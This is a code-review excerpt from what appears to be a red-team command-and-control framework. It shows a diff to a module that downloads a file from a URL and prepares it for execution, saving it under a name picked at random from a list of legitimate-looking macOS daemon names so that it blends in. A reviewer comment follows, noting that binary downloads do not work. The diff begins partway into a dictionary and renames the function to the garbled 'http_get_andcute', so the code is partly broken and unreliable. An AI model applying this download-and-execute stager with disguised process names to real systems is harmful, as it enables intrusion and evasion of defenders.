tavern/tomes/http_get_file_and_execute/main.eldritch

```diff
@@ -1,28 +1,72 @@
+    "PLATFORM_MACOS": ["CoreSyncAgent", "CloudKeychainProxy", "AppDataService", "SystemProfileHelper", "DiskUtilityAgent", "SpotlightInr", "KeychainManager", "MediaStreamHelper", "DockManager", "FinderSyncHost", "SessionAgent", "PowerMonitor", "BackupScheduler", "AppHelperDaemon", "LoginWindowAgent", "NetworkUtility", "CrashReporter", "BluetoothManager", "KernelEventMonitor", "SystemDiagnosticsAgent", "RemoteDesktopAgent", "NotificationHandler", "SecurityScanHelper", "FileProviderDaemon", "VirtualDiskService", "TimeMachineMonitor", "ResourceTracker", "AccessibilityHelper", "ScreenSharingHelper", "CredentialStore", "ProcessMonitor", "ConfigUpdater", "EnergyUsageMonitor", "FileSyncAgent", "MetadataServer", "WindowServerHelper", "AirDropManager", "AppUpdaterDaemon", "FirewallManager", "DisplayAgent", "SystemLogDaemon", "LocationServicesDaemon", "PrivacyHelper", "AppContainerDaemon", "EventMonitor", "ContentCacheDaemon", "ProcessScheduler", "HandoffAgent", "ClipboardManager", "NetworkMonitorDaemon", "StorageOptimizer", "BackgroundItemsAgent", "CrashLogger", "SandboxHelper", "ServiceWorkerDaemon", "SystemIntegrityAgent", "FileVaultHelper", "TelemetryMonitor", "AutoUpdateManager", "ServiceScheduler", "SessionLogger", "AccessibilityMonitor", "CloudServicesHelper", "LaunchServicesDaemon", "WindowManager", "SystemIdleAgent", "FirewallHelper", "BluetoothEventMonitor"],
+}
+
+
 def get_parent_process(process_name):
     for cur_proc in process.list():
         if process_name == cur_proc['name']:
             return cur_proc['ppid']
 
-def http_get_and_execute(url):
+
+def http_get_andcute(url):
+    # Get random process name
+    platform = sys.get_os()["platform"]
+    proc_name = PROC_NAMES[platform][random.int(
+        0, len(PROC_NAMES[platform]) - 1)]
+
+    proc_path = "/tmp/"
+    if platform == "PLATFORM_WINDOWS":
+        proc_path = "C:\\Windows\\temp\\"
+
     if sys.is_linux() or sys.is_macos():
+
+        print(f"Downloading {url} to {proc_path}{proc_name}")
+
         # Download
-        http.http_get(url, "./tmp.elf")
-        sys.shell("chmod +x ./tmp.elf")
+        file.write(f"{proc_path}{proc_name}", http.get(url))
```

Comment:
Does this work for binaries? Both of these functions work with the string type, idk how non-characters will work here

Reply:
Ahhh good catch.
It should but doesn't seem like it is i'll take a look at that.